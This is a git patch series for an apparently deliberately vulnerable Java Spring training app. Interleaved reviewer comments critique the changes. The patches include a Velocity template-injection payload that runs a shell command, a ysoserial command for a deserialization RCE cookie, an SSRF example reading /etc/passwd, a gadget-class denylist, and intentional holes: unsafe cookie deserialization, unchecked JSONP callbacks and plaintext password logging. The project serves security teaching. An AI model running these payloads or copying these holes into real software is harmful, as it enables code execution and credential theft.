@@ -43,6 +43,7 @@ - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP) - [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject) - [SSRF](https://github.com/JoyChou93/java-sec-code/wiki/SSRF) +- [SSTI](https://github.com/JoyChou93/java-sec-code/wiki/SSTI) - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass) - [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE) - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others) diff --git a/src/main/java/org/joychou/controller/SSTI.java b/src/main/java/org/joychou/controller/SSTI.java index 7e9d2edb..70e7c7a6 100644 --- a/src/main/java/org/joychou/controller/SSTI.java +++ b/src/main/java/org/joychou/controller/SSTI.java @@ -15,9 +15,11 @@ public class SSTI { /** - * SSTI of Java velocity. - * Open a calculator in MacOS. + * SSTI of Java velocity. The latest Velocity version still has this problem. + * Fix method: Avoid to use Velocity.evaluate method. + * * http://localhost:8080/ssti/velocity?template=%23set($e=%22e%22);$e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22open%20-a%20Calculator%22) + * Open a calculator in MacOS. * * @param template exp */ From 31f51708ed3de9c101093ad38712f54728704e34 Mon Sep 17 00:00:00 2001 From: JoyChou Date: Sat, 20 Jul 2019 12:24:28 +0800 Subject: [PATCH 08/67] add deserialize --- java-sec-code.iml | 2 +- .../org/joychou/controller/Deserialize.java | 104 ++++++++++++++---- .../java/org/joychou/controller/SSRF.java | 3 + .../security/AntObjectInputStream.java | 4 +- 4 files changed, 91 insertions(+), 22 deletions(-) diff --git a/java-sec-code.iml b/java-sec-code.iml index 9cb2ac16..0278f6c0 100644 --- a/java-sec-code.iml +++ b/java-sec-code.iml @@ -12,7 +12,7 @@ - + diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java index 964a7777..d597087c 100644 
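Review bot: the revised javadoc presents "Avoid to use Velocity.evaluate method" as the fix, which is not quite the rule: `Velocity.evaluate` is fine with templates the application ships, and the defect is passing a request parameter as the template text. Suggested wording: `Never render user-supplied text as a template; templates must come from the application, and request data may only enter through the VelocityContext.` Velocity's `SecureUberspector` (configured via `runtime.introspector.uberspect`) can additionally block reflective access from templates, but it is defence in depth rather than a substitute for that rule.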
--- a/src/main/java/org/joychou/controller/Deserialize.java +++ b/src/main/java/org/joychou/controller/Deserialize.java 
@@ -1,35 +1,99 @@ package org.joychou.controller; - -import org.springframework.stereotype.Controller; +import org.apache.commons.lang.StringUtils; +import org.joychou.security.AntObjectInputStream; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; import org.springframework.web.bind.annotation.RequestMapping; -import org.springframework.web.bind.annotation.ResponseBody; +import org.springframework.web.bind.annotation.RestController; +import javax.servlet.http.Cookie; import javax.servlet.http.HttpServletRequest; -import java.io.InputStream; +import java.io.ByteArrayInputStream; +import java.io.IOException; import java.io.ObjectInputStream; +import java.util.Base64; /** - * @author JoyChou (joychou@joychou.org) - * @Date 2018年06月14日 - * @Desc 该应用必须有Commons-Collections包才能利用反序列化命令执行。 + * Deserialize RCE using Commons-Collections gadget. + * + * @author JoyChou @2018-06-14 */ - -@Controller +@RestController @RequestMapping("/deserialize") public class Deserialize { - @RequestMapping("/test") - @ResponseBody - public static String deserialize_test(HttpServletRequest request) throws Exception{ - try { - InputStream iii = request.getInputStream(); - ObjectInputStream in = new ObjectInputStream(iii); - in.readObject(); // 触发漏洞 - in.close(); - return "test"; - }catch (Exception e){ - return "exception"; + + private static Logger logger= LoggerFactory.getLogger(Deserialize.class); + + /** + * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64 + * Add the result to rememberMe cookie. 
+ * + * http://localhost:8080/deserialize/rememberMe/vul + */ + @RequestMapping("/rememberMe/vul") + public static String rememberMeVul(HttpServletRequest request) + throws IOException, ClassNotFoundException { + + Cookie[] cookies = request.getCookies(); + String rememberMe = ""; + + if (null == cookies) { + logger.info("No cookies."); + } else { + for (Cookie cookie : cookies) { + if ( cookie.getName().equals("rememberMe") ) { + rememberMe = cookie.getValue(); + } + } + } + + if (StringUtils.isBlank(rememberMe) ) { + return "No rememberMe cookie. Right?"; } + + byte[] decoded = Base64.getDecoder().decode(rememberMe); + ByteArrayInputStream bytes = new ByteArrayInputStream(decoded); + ObjectInputStream in = new ObjectInputStream(bytes); + in.readObject(); + in.close(); + + return "Are u ok?"; + } + + /** + * Check deserialize class using black list. + * + * http://localhost:8080/deserialize/rememberMe/security + */ + @RequestMapping("/rememberMe/security") + public static String rememberMeBlackClassCheck(HttpServletRequest request) + throws IOException, ClassNotFoundException { + + Cookie[] cookies = request.getCookies(); + String rememberMe = ""; + + if (null == cookies) { + logger.info("No cookies in /rememberMe/security"); + } else { + for (Cookie cookie : cookies) { + if ( cookie.getName().equals("rememberMe") ) { + rememberMe = cookie.getValue(); + } + } + } + + if (StringUtils.isBlank(rememberMe) ) { + return "No rememberMe cookie. Right?"; + } + + byte[] decoded = Base64.getDecoder().decode(rememberMe); + ByteArrayInputStream bytes = new ByteArrayInputStream(decoded); + AntObjectInputStream in = new AntObjectInputStream(bytes); + in.readObject(); + in.close(); + + return "I'm very OK."; } } diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java index f774fb27..fec5cf23 100644 --- a/src/main/java/org/joychou/controller/SSRF.java +++ b/src/main/java/org/joychou/controller/SSRF.java 
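Review bot: both handlers call `Base64.getDecoder().decode(rememberMe)` without handling `IllegalArgumentException`, so a cookie that is not valid base64 becomes an unhandled exception rather than a clean 400; and in both, a throwing `in.readObject()` leaves the stream open because `in.close()` is only reached on success — `try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(decoded))) { in.readObject(); }` fixes that. The cookie lookup loop is duplicated verbatim between `rememberMeVul` and `rememberMeBlackClassCheck`; a private `rememberMeCookie(HttpServletRequest)` helper returning the value or `""` removes the copy. `logger` should be `private static final`, and the javadoc of `/rememberMe/security` should say that its protection is the prefix denylist in `AntObjectInputStream`, which blocks only the listed packages and is not a general fix.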
@@ -103,6 +103,9 @@ public static String ssrf_Request(HttpServletRequest request) * Download the url file. * http://localhost:8080/ssrf/openStream?url=file:///etc/passwd * + * new URL(String url).openConnection() + * new URL(String url).openStream() + * new URL(String url).getContent() */ @RequestMapping("/openStream") @ResponseBody diff --git a/src/main/java/org/joychou/security/AntObjectInputStream.java b/src/main/java/org/joychou/security/AntObjectInputStream.java index d837b4c1..b15d7589 100644 --- a/src/main/java/org/joychou/security/AntObjectInputStream.java +++ b/src/main/java/org/joychou/security/AntObjectInputStream.java @@ -36,7 +36,9 @@ protected Class resolveClass(final ObjectStreamClass desc) // Deserialize class name: org.joychou.security.AntObjectInputStream$MyObject logger.info("Deserialize class name: " + className); - String[] denyClasses = {"java.net.InetAddress", "org.apache.commons.collections.Transformer"}; + String[] denyClasses = {"java.net.InetAddress", + "org.apache.commons.collections.Transformer", + "org.apache.commons.collections.functors"}; for (String denyClass : denyClasses) { if (className.startsWith(denyClass)) { From 0a9c97825e216fed465f267a545ce365f751bc73 Mon Sep 17 00:00:00 2001 From: JoyChou Date: Sat, 20 Jul 2019 12:25:56 +0800 Subject: [PATCH 09/67] update readme --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 6f2e11f2..b273bf10 100644 --- a/README.md +++ b/README.md 
@@ -41,6 +41,7 @@ Sort by letter. - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE) - [CORS](https://github.com/JoyChou93/java-sec-code/wiki/CORS) - [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF) +- [Deserialize](https://github.com/JoyChou93/java-sec-code/wiki/Deserialize) - [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson) - [Java RMI](https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI) - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP) From 4763a3a3938d3e0b0775dc0ffb895e7fe13ce7b9 Mon Sep 17 00:00:00 2001 From: JoyChou Date: Sat, 20 Jul 2019 12:26:26 +0800 Subject: [PATCH 10/67] update readme --- README_zh.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README_zh.md b/README_zh.md index 9ae1820f..88d31149 100644 --- a/README_zh.md +++ b/README_zh.md @@ -38,6 +38,7 @@ - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE) - [CORS](https://github.com/JoyChou93/java-sec-code/wiki/CORS) - [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF) +- [Deserialize](https://github.com/JoyChou93/java-sec-code/wiki/Deserialize) - [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson) - [Java RMI](https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI) - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP) From 8a9977d02a03ac62ab6aad8e96d8534e4c443478 Mon Sep 17 00:00:00 2001 
From: JoyChou Date: Mon, 22 Jul 2019 00:07:50 +0800 Subject: [PATCH 11/67] add auth --- README.md | 21 ++++ README_zh.md | 20 ++++ .../java/org/joychou/controller/CORS.java | 14 +-- .../java/org/joychou/controller/CSRF.java | 12 +- .../java/org/joychou/controller/Index.java | 10 +- .../java/org/joychou/controller/Login.java | 58 ++++++++++ .../org/joychou/controller/jsonp/JSONP.java | 32 ++++-- .../security/AntObjectInputStream.java | 2 +- .../security/CsrfAccessDeniedHandler.java | 2 +- .../joychou/security/LoginFailureHandler.java | 32 ++++++ .../joychou/security/LoginSuccessHandler.java | 30 +++++ .../org/joychou/security/SecurityUtil.java | 2 - .../joychou/security/WebSecurityConfig.java | 27 ++++- src/main/resources/application.properties | 2 +- src/main/resources/static/css/login.css | 106 ++++++++++++++++++ .../resources/static/js/jquery-1.11.1.min.js | 4 + src/main/resources/templates/csrfTest.html | 27 ----- src/main/resources/templates/form.html | 19 ++++ src/main/resources/templates/login.html | 41 +++++++ 19 files changed, 397 insertions(+), 64 deletions(-) create mode 100644 src/main/java/org/joychou/controller/Login.java create mode 100644 src/main/java/org/joychou/security/LoginFailureHandler.java create mode 100644 src/main/java/org/joychou/security/LoginSuccessHandler.java create mode 100644 src/main/resources/static/css/login.css create mode 100644 src/main/resources/static/js/jquery-1.11.1.min.js delete mode 100644 src/main/resources/templates/csrfTest.html create mode 100644 src/main/resources/templates/form.html create mode 100644 src/main/resources/templates/login.html diff --git a/README.md b/README.md index b273bf10..77dfd32f 100644 --- a/README.md +++ b/README.md 
@@ -11,6 +11,27 @@ This project can also be called Java vulnerability code. Each vulnerability type code has a security vulnerability by default unless there is no vulnerability. The relevant fix code is in the comments or code. Specifically, you can view each vulnerability code and comments. +## Authenticate + +### Login + +[http://localhost:8080/login](http://localhost:8080/login) + +If you are not logged in, accessing any page will redirect you to the login page. The username & password are as follows. + +``` +admin/admin123 +joychou/joychou123 +``` + +### Logout + +[http://localhost:8080/logout](http://localhost:8080/logout) + +### RememberMe + +Tomcat's default JSESSION session is valid for 30 minutes, so a 30-minute non-operational session will expire. In order to solve this problem, the rememberMe function is introduced, and the default expiration time is 2 weeks. + ## Vulnerability Code Sort by letter. diff --git a/README_zh.md b/README_zh.md index 88d31149..f94932a1 100644 --- a/README_zh.md +++ b/README_zh.md @@ -10,6 +10,26 @@ 每个漏洞类型代码默认存在安全漏洞(除非本身不存在漏洞),相关修复代码在注释里。具体可查看每个漏洞代码和注释。 +## 认证 + +### 登录 + +[http://localhost:8080/login](http://localhost:8080/login) + +如果未登录,访问任何页面都会重定向到login页面。用户名和密码如下。 + +``` +admin/admin123 +joychou/joychou123 +``` +### 登出 + +[http://localhost:8080/logout](http://localhost:8080/logout) + +### 记住我 + +Tomcat默认JSESSION会话有效时间为30分钟,所以30分钟不操作会话将过期。为了解决这一问题,引入rememberMe功能,默认过期时间为2周。 + ## 漏洞代码 - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml) diff --git a/src/main/java/org/joychou/controller/CORS.java b/src/main/java/org/joychou/controller/CORS.java index 6c8d5625..bf93c7ce 100644 --- a/src/main/java/org/joychou/controller/CORS.java +++ b/src/main/java/org/joychou/controller/CORS.java 
@@ -1,10 +1,10 @@ package org.joychou.controller; import org.joychou.security.SecurityUtil; -import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.CrossOrigin; import org.springframework.web.bind.annotation.RequestMapping; -import org.springframework.web.bind.annotation.ResponseBody; +import org.joychou.controller.jsonp.JSONP; +import org.springframework.web.bind.annotation.RestController; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; @@ -15,7 +15,7 @@ * @desc https://github.com/JoyChou93/java-sec-code/wiki/CORS */ -@Controller +@RestController @RequestMapping("/cors") public class CORS { @@ -23,7 +23,6 @@ public class CORS { protected static String[] urlwhitelist = {"joychou.com", "joychou.me"}; @RequestMapping("/vuls1") - @ResponseBody private static String vuls1(HttpServletRequest request, HttpServletResponse response) { // 获取Header中的Origin String origin = request.getHeader("origin"); @@ -33,7 +32,6 @@ private static String vuls1(HttpServletRequest request, HttpServletResponse resp } @RequestMapping("/vuls2") - @ResponseBody private static String vuls2(HttpServletResponse response) { // 不建议设置为* // 后端设置Access-Control-Allow-Origin为*的情况下,跨域的时候前端如果设置withCredentials为true会异常 @@ -43,15 +41,13 @@ private static String vuls2(HttpServletResponse response) { @CrossOrigin("*") @RequestMapping("/vuls3") - @ResponseBody private static String vuls3(HttpServletResponse response) { return info; } @RequestMapping("/sec") - @ResponseBody - private static String seccode(HttpServletRequest request, HttpServletResponse response) { + public String seccode(HttpServletRequest request, HttpServletResponse response) { String origin = request.getHeader("Origin"); // 如果origin不为空并且origin不在白名单内,认定为不安全。 
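Review bot: `seccode` becomes `public` and non-static while `vuls1`, `vuls2` and `vuls3` in the same class stay `private static`, so the controller now mixes two handler conventions for no stated reason. If the change is needed so other code can call `seccode`, a one-line comment saying so would explain the asymmetry; otherwise the other three handlers should follow the same visibility in this commit.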
@@ -61,7 +57,7 @@ private static String seccode(HttpServletRequest request, HttpServletResponse re } response.setHeader("Access-Control-Allow-Origin", origin); response.setHeader("Access-Control-Allow-Credentials", "true"); - return info; + return JSONP.getUserInfo(request); } diff --git a/src/main/java/org/joychou/controller/CSRF.java b/src/main/java/org/joychou/controller/CSRF.java index ea33c59e..5481260e 100644 --- a/src/main/java/org/joychou/controller/CSRF.java +++ b/src/main/java/org/joychou/controller/CSRF.java @@ -7,20 +7,18 @@ import org.springframework.web.bind.annotation.ResponseBody; /** - * @author JoyChou (joychou@joychou.org) - * @date 2019.05.31 - * @desc check csrf using spring-security - * @usage Access http://localhost:8080/csrf/ -> click submit + * check csrf using spring-security + * Access http://localhost:8080/csrf/ -> click submit + * + * @author JoyChou (joychou@joychou.org) @2019-05-31 */ - - @Controller @RequestMapping("/csrf") public class CSRF { @GetMapping("/") public String index() { - return "csrfTest"; + return "form"; } @PostMapping("/post") diff --git a/src/main/java/org/joychou/controller/Index.java b/src/main/java/org/joychou/controller/Index.java index 4f2fab99..e38761d1 100644 --- a/src/main/java/org/joychou/controller/Index.java +++ b/src/main/java/org/joychou/controller/Index.java @@ -6,6 +6,7 @@ import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.ResponseBody; +import javax.servlet.http.HttpServletRequest; import java.util.HashMap; import java.util.Map; 
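Review bot: `return JSONP.getUserInfo(request);` changes /cors/sec from fixed sample data to the authenticated user's name, sent alongside `Access-Control-Allow-Credentials: true` and a reflected Origin, so the origin whitelist check earlier in seccode (outside this hunk) is now the only thing keeping a user-specific response from a foreign site. That check presumably goes through `SecurityUtil.checkURLbyEndsWith(origin, urlwhitelist)` as the JSONP controller does, and its body is not in this diff; confirm it compares the host of the Origin against a dot-anchored whitelist entry rather than a bare string suffix, since reflecting the Origin together with credentials is only safe with an exact host match. A comment on the setHeader lines such as `// Origin is validated above; reflecting an unvalidated Origin with Allow-Credentials=true exposes the user's data` would record why the order matters.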
@@ -18,11 +19,14 @@ @Controller public class Index { - @RequestMapping("/") + @RequestMapping("/index") @ResponseBody - public static String index() { + public static String index(HttpServletRequest request) { + String username = request.getUserPrincipal().getName(); Map m = new HashMap(); - m.put("app_name", "java_vul_code"); + m.put("username", username); + m.put("login", "success"); + m.put("app_name", "java security code"); m.put("java_version", System.getProperty("java.version")); m.put("fastjson_version", JSON.VERSION); diff --git a/src/main/java/org/joychou/controller/Login.java b/src/main/java/org/joychou/controller/Login.java new file mode 100644 index 00000000..7983efcd --- /dev/null +++ b/src/main/java/org/joychou/controller/Login.java 
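Review bot: `String username = request.getUserPrincipal().getName();` dereferences the principal without a null check; `/index` sits behind `anyRequest().authenticated()` in WebSecurityConfig so it should normally be present, but any path that reaches the handler unauthenticated turns into a NullPointerException and a 500 page instead of the login redirect. Use `Principal p = request.getUserPrincipal(); String username = p == null ? "anonymous" : p.getName();` with `java.security.Principal` imported. `Map m = new HashMap();` is a raw type and every value put into it is a String, so `Map<String, String> m = new HashMap<>();` is the right declaration. The body of index continues past the end of the hunk.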
@@ -0,0 +1,58 @@
+package org.joychou.controller;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.security.core.Authentication;
+import org.springframework.security.core.context.SecurityContextHolder;
+import org.springframework.security.web.authentication.logout.SecurityContextLogoutHandler;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
+
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+
+@Controller
+public class Login {
+
+ protected final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+ @RequestMapping("/login")
+ public String login() {
+ return "login";
+ }
+
+ @GetMapping("/logout")
+ public String logoutPage (HttpServletRequest request, HttpServletResponse response) {
+
+ String username = request.getUserPrincipal().getName();
+
+ Authentication auth = SecurityContextHolder.getContext().getAuthentication();
+ if (auth != null) {
+ new SecurityContextLogoutHandler().logout(request, response, auth);
+ }
+
+ String[] deleteCookieKey = {"JSESSIONID", "remember-me"}; // delete cookie
+ for (String key : deleteCookieKey) {
+ Cookie cookie = new Cookie(key, null);
+ cookie.setMaxAge(0);
+ cookie.setPath("/");
+ response.addCookie(cookie);
+ }
+
+ if (null == request.getUserPrincipal()) {
+ logger.info("User " + username + " logout successfully.");
+ } else {
+ logger.info("User " + username + " logout failed. Please try again.");
+ }
+
+ return "redirect:/login?logout";
+ }
+
+ @RequestMapping("/")
+ public String redirect() {
+ return "redirect:/index";
+ }
+}
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java
index 2f474440..9c7eac25
--- a/src/main/java/org/joychou/controller/jsonp/JSONP.java
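Review bot: logoutPage is mapped with `@GetMapping("/logout")` and performs the logout itself, so a cross-site GET request is enough to log a user out (logout CSRF); Spring Security's LogoutFilter defaults to POST-only while CSRF protection is enabled, and this controller gives a GET the same effect without any token. Map it with `@PostMapping("/logout")` and submit the logout form with the CSRF token, or drop the controller method and rely on the `.logout()` configuration in WebSecurityConfig. `String username = request.getUserPrincipal().getName();` throws a NullPointerException for an unauthenticated caller, which `.logout().logoutUrl("/logout").permitAll()` allows to reach this method; read the principal into a local and null-check it before use. Clearing the `remember-me` cookie only affects this browser, and with the token-based remember-me that `.rememberMe()` configures by default the token itself stays valid until it expires, which deserves a comment on the `deleteCookieKey` line. The two `logger.info` calls build messages by concatenation; `logger.info("User {} logout successfully.", username);` is the SLF4J form.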
+++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java @@ -7,7 +7,9 @@ import org.springframework.web.bind.annotation.*; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; - +import java.security.Principal; +import java.util.HashMap; +import java.util.Map; /** @@ -19,10 +21,20 @@ @RequestMapping("/jsonp") public class JSONP { - private static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}"; private static String[] urlwhitelist = {"joychou.com", "joychou.org"}; + // get current login username + public static String getUserInfo(HttpServletRequest request) { + Principal principal = request.getUserPrincipal(); + + String username = principal.getName(); + + Map m = new HashMap(); + m.put("Username", username); + + return JSON.toJSONString(m); + } /** * Set the response content-type to application/javascript. * @@ -30,9 +42,9 @@ public class JSONP { * */ @RequestMapping(value = "/referer", produces = "application/javascript") - private static String referer(HttpServletRequest request, HttpServletResponse response) { + private String referer(HttpServletRequest request, HttpServletResponse response) { String callback = request.getParameter("callback"); - return callback + "(" + info + ")"; + return callback + "(" + getUserInfo(request) + ")"; } /** @@ -43,7 +55,7 @@ private static String referer(HttpServletRequest request, HttpServletResponse re * */ @RequestMapping(value = "/emptyReferer", produces = "application/javascript") - private static String emptyReferer(HttpServletRequest request, HttpServletResponse response) { + private String emptyReferer(HttpServletRequest request, HttpServletResponse response) { String referer = request.getHeader("referer"); if (null != referer && !SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) { 
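Review bot: getUserInfo calls `principal.getName()` without checking that `request.getUserPrincipal()` returned a value, so a request that reaches any of these endpoints without an authenticated session ends in a NullPointerException rather than an empty result; guard it with `m.put("Username", principal == null ? "" : principal.getName());`. `Map m = new HashMap();` is a raw type — `Map<String, String>` is what the code puts into it. Since the method is `public static` and is now also called from the CORS controller, it is a shared helper rather than controller code; the `// get current login username` comment should become a Javadoc stating that it returns the JSON string with a single `Username` key for the current principal, and the helper would sit more naturally in a security or service class than in a controller. The referer hunk later in this line and the emptyReferer hunk make the same one-line change, so the payload those endpoints wrap in the caller-supplied callback is now per-user data rather than fixed sample data.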
@@ -51,7 +63,7 @@ private static String emptyReferer(HttpServletRequest request, HttpServletRespon } String callback = request.getParameter("callback"); - return callback + "(" + info + ")"; + return callback + "(" + getUserInfo(request) + ")"; } /** @@ -63,8 +75,8 @@ private static String emptyReferer(HttpServletRequest request, HttpServletRespon * Such as JSONOjbect or JavaBean. String type cannot be used. */ @RequestMapping(value = "/advice", produces = MediaType.APPLICATION_JSON_VALUE) - public JSONObject advice() { - return JSON.parseObject(info); + public JSONObject advice(HttpServletRequest request) { + return JSON.parseObject(getUserInfo(request)); } @@ -73,7 +85,7 @@ public JSONObject advice() { * http://localhost:8080/jsonp/sec?callback=test */ @RequestMapping(value = "/sec", produces = "application/javascript") - private static String safecode(HttpServletRequest request, HttpServletResponse response) { + private String safecode(HttpServletRequest request, HttpServletResponse response) { String referer = request.getHeader("referer"); if (!SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) { @@ -81,7 +93,7 @@ private static String safecode(HttpServletRequest request, HttpServletResponse r } String callback = request.getParameter("callback"); - return callback + "(" + info + ")"; + return callback + "(" + getUserInfo(request) + ")"; } diff --git a/src/main/java/org/joychou/security/AntObjectInputStream.java b/src/main/java/org/joychou/security/AntObjectInputStream.java index b15d7589..ef332360 100644 --- a/src/main/java/org/joychou/security/AntObjectInputStream.java +++ b/src/main/java/org/joychou/security/AntObjectInputStream.java 
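Review bot: safecode validates the referer but still concatenates the `callback` request parameter into an `application/javascript` body as-is, and after this hunk that body carries the authenticated user's name rather than static data; restrict the callback to identifier characters before use, e.g. `if (callback == null || !callback.matches("[A-Za-z0-9_$.]+")) { return ""; }`, returning an empty body or a 400 on failure. Unlike emptyReferer, safecode passes a possibly-null referer straight into `SecurityUtil.checkURLbyEndsWith`, whose null handling is not visible in this diff; either confirm it rejects null or add the null check here, since a missing Referer header must not be treated as trusted. The advice hunk serialises the map with `getUserInfo(request)` only to `JSON.parseObject` it back into a JSONObject; building the JSONObject directly avoids the round trip. The safecode body continues outside the hunk.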
@@ -13,7 +13,7 @@ */ public class AntObjectInputStream extends ObjectInputStream { - private final Logger logger= LoggerFactory.getLogger(AntObjectInputStream.class); + protected final Logger logger= LoggerFactory.getLogger(AntObjectInputStream.class); public AntObjectInputStream(InputStream inputStream) throws IOException { super(inputStream); diff --git a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java index 65d9e6f3..8471ea0c 100644 --- a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java +++ b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java @@ -19,7 +19,7 @@ */ public class CsrfAccessDeniedHandler implements AccessDeniedHandler { - private final Logger logger= LoggerFactory.getLogger(CsrfAccessDeniedHandler.class); + protected final Logger logger= LoggerFactory.getLogger(this.getClass()); @Override public void handle(HttpServletRequest request, HttpServletResponse response, diff --git a/src/main/java/org/joychou/security/LoginFailureHandler.java b/src/main/java/org/joychou/security/LoginFailureHandler.java new file mode 100644 index 00000000..ab3329e1 --- /dev/null +++ b/src/main/java/org/joychou/security/LoginFailureHandler.java 
@@ -0,0 +1,32 @@
+package org.joychou.security;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.http.MediaType;
+import org.springframework.security.core.AuthenticationException;
+import org.springframework.security.web.authentication.AuthenticationFailureHandler;
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+
+
+
+public class LoginFailureHandler implements AuthenticationFailureHandler {
+
+ protected final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+ @Override
+ public void onAuthenticationFailure(HttpServletRequest request,
+ HttpServletResponse response, AuthenticationException exception)
+ throws ServletException, IOException {
+
+ logger.info("Login failed. " + request.getRequestURL() +
+ " username: " + request.getParameter("username") +
+ " password: " + request.getParameter("password") );
+
+ response.setContentType(MediaType.APPLICATION_JSON_VALUE);
+ response.getWriter().write("{\"code\":0, \"message\":\"Login failed.\"}");
+ }
+
+}
diff --git a/src/main/java/org/joychou/security/LoginSuccessHandler.java b/src/main/java/org/joychou/security/LoginSuccessHandler.java
new file mode 100644
index 00000000..05b7cb2c
--- /dev/null
+++ b/src/main/java/org/joychou/security/LoginSuccessHandler.java
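Review bot: onAuthenticationFailure logs the submitted password in clear text via `" password: " + request.getParameter("password")`; failed logins routinely carry a real password with a typo or one the user reuses elsewhere, so this puts credentials into the log files and into anything the logs are shipped to. Remove the password from the message and use the parameterized form, `logger.info("Login failed. url={} username={}", request.getRequestURL(), request.getParameter("username"));`. The JSON failure body is written with the default 200 status; `response.setStatus(HttpServletResponse.SC_UNAUTHORIZED);` before the write lets clients tell failure from success without parsing the body. `logger` is `protected` here and `private` in LoginSuccessHandler in the next file; pick one visibility for both handlers.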
@@ -0,0 +1,30 @@
+package org.joychou.security;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.http.MediaType;
+import org.springframework.security.core.Authentication;
+import org.springframework.security.web.authentication.AuthenticationSuccessHandler;
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+
+
+
+public class LoginSuccessHandler implements AuthenticationSuccessHandler {
+
+ private final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+ @Override
+ public void onAuthenticationSuccess(HttpServletRequest request,
+ HttpServletResponse response, Authentication authentication)
+ throws ServletException, IOException {
+
+ logger.info("USER : " + authentication.getName()+ " LOGIN success!");
+
+ // google ajax and sendRedirect
+ response.setContentType(MediaType.APPLICATION_JSON_VALUE);
+ response.getWriter().write("{\"code\":1,\"message\":\"Login success!\"}");
+ }
+}
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index 63de75d8..edab9ab7
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -1,7 +1,5 @@ package org.joychou.security; - - import java.net.URI; public class SecurityUtil {
diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java
index 5ad22e2b..127115f3
--- a/src/main/java/org/joychou/security/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/security/WebSecurityConfig.java
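Review bot: The comment `// google ajax and sendRedirect` does not say why the handler writes a JSON body instead of the default redirect; if the login page submits by AJAX and navigates on its own, say that: `// The login page posts via AJAX and redirects itself on success, so answer with JSON rather than a redirect.` (the template is not in this diff, so confirm). `response.setContentType(MediaType.APPLICATION_JSON_VALUE)` sets no charset, which is harmless for this fixed ASCII body but would bite if the username were ever included; `response.setCharacterEncoding("UTF-8");` before the write settles it. `logger.info("USER : " + authentication.getName()+ " LOGIN success!")` should use the SLF4J placeholder form, and the logger's `private` visibility should match the `protected` logger in LoginFailureHandler.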
@@ -1,7 +1,9 @@ package org.joychou.security; +import org.springframework.beans.factory.annotation.Autowired; import org.springframework.beans.factory.annotation.Value; import org.springframework.context.annotation.Configuration; +import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder; import org.springframework.security.config.annotation.web.builders.HttpSecurity; import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity; import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter; 
